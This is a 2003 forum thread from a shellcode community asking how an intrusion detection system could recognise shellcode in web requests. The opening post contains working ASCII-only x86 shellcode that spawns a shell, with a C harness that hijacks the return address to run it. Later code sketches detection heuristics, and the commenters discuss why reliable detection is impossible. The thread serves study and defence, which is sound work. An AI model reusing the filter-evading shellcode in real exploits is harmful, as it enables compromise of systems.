Steve Kemp ([info]skx) wrote in [info]shellcode,
@ 2003-08-05 21:38:00
IDS evasion..

 I was thinking about remote exploits earlier - how to debug an application which you've overflowed remotely.

 As a sample I wrote an Apache module which contained a static buffer and was overflowable - but before I could really get into working through it I started wondering how to catch this.. This is me with my white-hat on ;)

 The obvious approach would be to write yet another Apache module to filter out any request containing "shellcode", since the shellcode would have to be part of the request...

 However this soon proved tricky - how do you recognise shellcode? NOPs? The string '/bin/sh'? These can all be obfuscated away - and NOPs are only used for padding when you're not sure of the exact offset anyway.
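 To make the naive check concrete, here is a minimal sketch in C of scanning a request for those two giveaways. The function names and the threshold of 16 consecutive NOPs are made up for illustration; this is not taken from any real Apache module.

```c
#include <stddef.h>
#include <string.h>

/* Length of the longest run of x86 NOP bytes (0x90) in buf. */
size_t longest_nop_run(const unsigned char *buf, size_t len)
{
    size_t best = 0, run = 0;

    for (size_t i = 0; i < len; i++) {
        run = (buf[i] == 0x90) ? run + 1 : 0;
        if (run > best)
            best = run;
    }
    return best;
}

/* Return 1 if needle occurs anywhere in buf (buf may contain NUL bytes). */
int contains_bytes(const unsigned char *buf, size_t len, const char *needle)
{
    size_t n = strlen(needle);

    if (n == 0 || n > len)
        return 0;
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(buf + i, needle, n) == 0)
            return 1;
    return 0;
}

/* Hypothetical rule: flag 16 or more consecutive NOPs, or a literal "/bin/sh". */
int looks_like_naive_shellcode(const unsigned char *buf, size_t len)
{
    return longest_nop_run(buf, len) >= 16
        || contains_bytes(buf, len, "/bin/sh");
}
```

 Anything that avoids the literal 0x90 byte and the literal string passes straight through, which is exactly the weakness described above.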

 So I thought about frequency counts of the characters in the URL - looking for non-ASCII characters.
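 A rough sketch of that byte-counting idea in C, assuming the request is available as a raw buffer. The names and the percentage threshold are hypothetical, chosen only to show the shape of the check.

```c
#include <stddef.h>

/* Count bytes outside the printable ASCII range 0x20..0x7e. */
size_t count_non_printable(const unsigned char *buf, size_t len)
{
    size_t n = 0;

    for (size_t i = 0; i < len; i++)
        if (buf[i] < 0x20 || buf[i] > 0x7e)
            n++;
    return n;
}

/*
 * Hypothetical policy: treat the request as suspicious when more than
 * max_percent of its bytes are non-printable. Empty input is never flagged.
 */
int too_many_non_printable(const unsigned char *buf, size_t len,
                           unsigned max_percent)
{
    if (len == 0)
        return 0;
    return count_non_printable(buf, len) * 100 > (size_t)max_percent * len;
}
```

 With a 10% threshold, a buffer holding the raw bytes 0x90 0x90 0x31 0xc0 followed by "AB" is flagged (three of its six bytes are non-printable), while an ordinary "GET /index.html" is not.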

 After a while though I realised that you could write shellcode in pure ASCII.

 This is the result:

/*
 * Run a shell via asm - ASCII only.
 *
 */

#include <stdio.h>   /* printf */
#include <string.h>  /* strlen */

char shellcode[] =
  "LLLLYhb0pLX5b0pLHSSPPWQPPaPWSUTBRDJfh5tDS"
  "RajYX0Dka0TkafhN9fYf1Lkb0TkdjfY0Lkf0Tkgfh"
  "6rfYf1Lki0tkkh95h8Y1LkmjpY0Lkq0tkrh2wnuX1"
  "Dks0tkwjfX0Dkx0tkx0tkyCjnY0LkzC0TkzCCjtX0"
  "DkzC0tkzCj3X0Dkz0TkzC0tkzChjG3IY1LkzCCCC0"
  "tkzChpfcMX1DkzCCCC0tkzCh4pCnY1Lkz1TkzCCCC"
  "fhJGfXf1Dkzf1tkzCCjHX0DkzCCCCjvY0LkzCCCjd"
  "X0DkzC0TkzCjWX0Dkz0TkzCjdX0DkzCjXY0Lkz0tk"
  "zMdgvvn9F1r8F55h8pG9wnuvjrNfrVx2LGkG3IDpf"
  "cM2KgmnJGgbinYshdvD9d";


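int main(int argc, char *argv[])
{
  int *ret;

  /* strlen() returns size_t, so print it with %zu rather than %d. */
  printf("Length is %zu\n", strlen(shellcode));

  /* Classic 32-bit x86 trick: step from the local variable up the stack
   * to the saved return address and point it at the shellcode, so that
   * returning from main() jumps into it. The +2 offset depends on the
   * compiler and stack layout. */
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
  return( 0 );
}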

 So the question remains - How do you detect shellcode?





[info]hughe
2003-08-05 03:23 pm UTC (link)
answer: you execute it in a sandbox until it works :)



[info]hughe
2003-08-05 04:46 pm UTC (link)
seriously, though...

process each byte as the start of a shellcode sequence and interpret it to get x number of valid instructions.

of course it will probably be urlencoded, and might be mangled in another way depending on the exploit (eg, try finding shellcode in a format string type exploit string)
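Undoing the URL encoding would have to happen before any scan. A minimal sketch of a percent-decoder in C follows; the function names are made up here, and leaving malformed escapes and '+' untouched is an assumption rather than a statement of what Apache does.

```c
#include <ctype.h>
#include <stddef.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_value(unsigned char c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    c = (unsigned char)tolower(c);
    if (c >= 'a' && c <= 'f')
        return c - 'a' + 10;
    return -1;
}

/*
 * Decode %XX escapes from src (src_len bytes) into dst and return the
 * number of bytes written. dst must have room for src_len bytes.
 * Malformed escapes are copied through unchanged; '+' is left alone
 * because it only means "space" in form-encoded data.
 */
size_t url_decode(const char *src, size_t src_len, unsigned char *dst)
{
    size_t out = 0;

    for (size_t i = 0; i < src_len; i++) {
        if (src[i] == '%' && i + 2 < src_len) {
            int hi = hex_value((unsigned char)src[i + 1]);
            int lo = hex_value((unsigned char)src[i + 2]);

            if (hi >= 0 && lo >= 0) {
                dst[out++] = (unsigned char)(hi * 16 + lo);
                i += 2;   /* skip the two hex digits just consumed */
                continue;
            }
        }
        dst[out++] = (unsigned char)src[i];
    }
    return out;
}
```

Decoding "%2Fbin%2Fsh" this way yields the seven bytes "/bin/sh", so a scanner that only looked at the raw request would never see the string.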

The problem is most likely that strings that aren't shellcode will get mistaken for shellcode: file uploads, uuencoded stuff, etc.

here's a task.. write shellcode in ascii that actually says something (ok it doesn't need to start a shell but must do something of value)



[info]skx
2003-08-06 05:02 am UTC (link)
I guess you'd need to do the interpretation to know how many bytes each instruction plus its operands took up - but it feels like the wrong way to do it.

(have you seen the intel reference manuals - they're huge).

I think you could ignore file uploads and form postings in general as the encoding would be known, and you could ignore downloads too if you assume that you're going to only look at requests.

One issue I see is fragmentation - it could be the case that a few requests could be made, each containing a section of the evil shellcode, and the exploit would search for and reassemble them in the target...



[info]hughe
2003-08-06 05:22 am UTC (link)
> (have you seen the intel reference manuals - they're huge).

i was up til 4am last night reading through some of the intel pdfs, so yes :)

> it could be the case that a few requests could be made each containing a section of the evil shellcode, and the exploit would search for and reassemble them in the target...

but to do that there would need to be some type of executable machine code to connect them.

I wonder how time consuming it would be to execute the bytes until a sequence of valid code is found (say 8 valid instructions?)

There doesn't seem much point in looking for a particular sequence, because it can always be obfuscated.

btw.. did you have time to look at asm_calling_procedures.html?



[info]skx
2003-08-06 05:35 am UTC (link)
Limiting yourself to ASCII narrows it down a bit though - as you can see from this ASCII opcode table.
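To give a feel for how small the ASCII subset is, here is a toy length decoder in C for a handful of printable 32-bit x86 opcodes, plus a linear sweep that tries every offset. It is a sketch only: the function names are invented, opcodes that take a ModRM byte (such as the 0x30/0x31 XOR forms) are deliberately left out, and jumps are not followed.

```c
#include <stddef.h>

/*
 * Length in bytes of the instruction at p (n bytes available), or 0 if
 * it falls outside this toy subset. 32-bit mode is assumed.
 */
size_t ascii_insn_len(const unsigned char *p, size_t n)
{
    size_t prefix = 0, imm = 4, need;

    if (n == 0)
        return 0;
    if (p[0] == 0x66) {                /* 'f': operand-size prefix, 16-bit immediates */
        prefix = 1;
        imm = 2;
        if (n < 2)
            return 0;
    }
    unsigned char op = p[prefix];

    if (op >= 0x40 && op <= 0x61)      /* '@'..'a': inc/dec/push/pop reg, pusha, popa */
        need = 1;
    else if (op == 0x68 || op == 0x35) /* 'h': push imm, '5': xor eax,imm */
        need = 1 + imm;
    else if (op == 0x6a)               /* 'j': push imm8 */
        need = 2;
    else if (op >= 0x70 && op <= 0x7e) /* 'p'..'~': conditional jump, rel8 */
        need = 2;
    else
        return 0;

    need += prefix;
    return need <= n ? need : 0;
}

/* Number of consecutive subset instructions decodable from offset start. */
size_t count_insns_from(const unsigned char *buf, size_t len, size_t start)
{
    size_t count = 0, pos = start;

    while (pos < len) {
        size_t l = ascii_insn_len(buf + pos, len - pos);
        if (l == 0)
            break;
        pos += l;
        count++;
    }
    return count;
}

/* Return 1 if any offset starts a run of at least min_insns instructions. */
int has_insn_run(const unsigned char *buf, size_t len, size_t min_insns)
{
    for (size_t i = 0; i < len; i++)
        if (count_insns_from(buf, len, i) >= min_insns)
            return 1;
    return 0;
}
```

The opening bytes of the shellcode in the post, "LLLLYhb0pLX5b0pLH", decode as nine instructions in a row under this subset. The catch is that "GET" also decodes cleanly (inc edi, inc ebp, push esp), so the false-positive worry raised earlier in the thread shows up immediately.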

(I had a look at your asm piece, but haven't had time to digest it yet).



[info]andiblue
2003-11-21 03:22 am UTC (link)
> So the question remains - How do you detect shellcode?

from a theoretical point of view - if there are boundless ways to represent shellcode (programs) [which, with you creative programmers, I am sure is sort-of true, but arguable] then you cannot create a general method to detect all executing shellcode (certainly not statically). I have a proof which shows this for viruses; a simple modification would demonstrate it for shellcode (obviously I use a possibly idealistic model)

with regards to sandboxing (dynamic analysis ;)... if you sandbox the code you run into the halting problem - ie when should we call it a day with the code we are analysing and let it do its job...? or chuck it out?

The best we could do may be an over-optimistic analysis which would produce false-positives (but would otherwise work fine.)

any thoughts?



[info]skx
2003-11-25 05:05 am UTC (link)
Yes I agree - you cannot do this reliably, as it's just too easy to use some kind of polymorphic code generation to mask your shellcode.

The best you can do is look for indicators such as large numbers of nops/nulls and strings like /bin/sh.

I think that the heuristic approach would work well for a while, but it would just be a matter of time before it changed into an arms race.

(For example mod_security does some filtering of incoming Apache requests based on pattern matching; it's something like the system I was mentioning previously).
